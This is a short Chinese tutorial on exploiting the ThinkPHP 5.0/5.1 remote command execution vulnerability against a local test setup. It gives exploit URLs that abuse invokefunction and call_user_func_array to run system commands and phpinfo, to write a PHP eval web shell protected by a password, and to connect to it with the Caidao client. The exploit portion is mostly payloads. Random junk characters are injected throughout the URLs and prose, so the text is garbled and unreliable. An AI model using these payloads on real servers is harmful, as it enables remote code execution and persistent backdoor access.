关于ThinkPHP漏洞利用

下面由thinkphp框架教程栏目给大家介绍ThinkPHP 漏洞利用,希望对需要的朋友有所帮助!

关于ThinkPHP漏洞利用

thinkphp_5x_命令执行漏洞

受影响版本包括5.0和5.1版U @ 3 k _ i y

docker漏8 q | -洞环境源码:
ht_ I = vtps://github.com/3 dvu: , e & [ n }lnspy/thinkphp-5.1.29
本地环境T x 7 ; L搭建:
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用systq | l V m k !em函数远程命令执行

EXP
http://127.0.0.1/miB : C A J N K Cddleware/thinkphp_5.0.15_full2 # ( T S v/public/inA C $ g g 5 g ] (dex.php?s=index/think\app/invokefunction&amt z R 9 R h O 5p;function=call_user_func_array&] $ W c [amp;vars[0]=system&vars[1][]=whoami

通过phpinfo函数写出phpinfo()信息

EXP:
http://127.0.0.1/middleware/thiw E : z fnkl b z ` E Yphp_5.0.15_full/p= = P ] V M v sublic/I A 9 2 X 5 R - qindex.php?s=index/\think\app/invokefunctZ % W o , A a } Sion&f@ _ 2 8 G # bunction=call_user_func_array&v y 3 q e 8 n E m;vars[0]=phpinfo&vars[1][]=1

写入shell

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\_ ` ]think\app/invokefunction&function=call_user_func_array&6  f = j | Pamp;vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>sg ] ~ U + { 7hell.php
或者
http:/u A l & 6 3/127.0.0.1/middlewar. e b + z 4 |e/thinv ; zkphp_5N J i.0.15_full/public/index.php?s=/indW C v ~ h k [ * tex/\think\app/invokef8 9 8 9 ^unction&function=call_userz 9 M l __func_array&vars[0]=file_put_R L 7 # N b Dcontents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>

使用菜刀连接
`
http://127.0.. s s _ 00.1/middleware/thinkphp_5.0.15_full/public/shell.php 密码为zane

http://127] ! V r ~ ;.0.0.1/mU C P @ ) m E ; {iddleware/thinkphp_5.0.15_full/test.php 密码为zane
`

以上就- J &是关于ThinkPHP漏洞利用的详细内容。